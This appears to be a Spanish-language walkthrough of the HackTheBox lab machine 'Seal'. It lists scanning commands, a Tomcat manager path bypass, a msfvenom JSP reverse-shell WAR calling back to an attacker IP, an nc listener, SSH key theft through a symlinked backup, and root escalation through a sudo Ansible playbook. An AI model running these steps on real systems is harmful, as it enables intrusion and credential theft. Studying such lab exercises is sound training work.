echo "10.129.186.118  seal.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA seal 10.129.186.118 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210721094438.png

nmap -sC -sV -O -p- -oA seal 10.129.186.118

nmap -sU -O -p- -oA seal-udp 10.129.186.118

nikto -h 10.129.186.118:80

gobuster dir -k -u http://10.129.186.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

fuff -w /usr/share/wordlists/dirb/big.txt -u http://10.129.186.118/FUZZ -t 200

Pasted image 20210721094710.png

Vamos a http://10.129.186.118:8080

Pasted image 20210721095104.png

Vamos a http://10.129.186.118:8080/register y creamos un usuario

Pasted image 20210721095235.png

Vamos a root /seal market y vemos tomcat-users.xml

Pasted image 20210721095806.png

Encontramos el usuario tomcat con su contrasena

Pasted image 20210721095823.png

Vamos a http://10.129.186.118/manager/status

Y usamos las credenciales de tomcat que encontramos en el paso anterior.

Pasted image 20210721100143.png

Vamos a http://10.129.186.118/manager/status/..;/html

Pasted image 20210721100334.png

msfvenom ip java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f war -o seal_shell.war

Pasted image 20210721100655.png

Subimos el archivo war en la pagina de aplicaciones

Pasted image 20210721100811.png

Refrescamos la pagina y vemos seal_shell.war se subio

Le damos click a deploy

nc -lvnp 4444

Pasted image 20210721111901.png

Conseguimos un reverse shell

ps -aux | grep -i 'bin/sh'

Pasted image 20210721112538.png

ls -ahl /opt/backups/archives

cd /var/lib/tomcat9/webapps/ROOT/admin/dashboard/

cd /home

cd luis

Pasted image 20210721112823.png

ln -s /home/luis.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

cd .ssh

cp /opt/backups/archives/backup-2021-07-21-17\:30\:33.gz rsa.gz

gzip -kd rsa

Pasted image 20210721113613.png

cd .ssh

python3 -m http.server 8888

wget http://10.129.186.118:8888/id_rsa.pub

chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb

Pasted image 20210721121032.png

Crear archivo root.yml

- name: Ansible Copy Example Local to Remote
  hosts: localhost
  tasks:
    - name: copying file with playbook
      become: true 
      copy:
        src: /root/root.txt
        dest: /dev/shm
        owner: luis
        group: luis        
        mode: 0777

sudo /usr/bin/ansible-playbook root.yml

Pasted image 20210723162019.png

boxes

copyright©2022 Cu3rv0x all rights reserved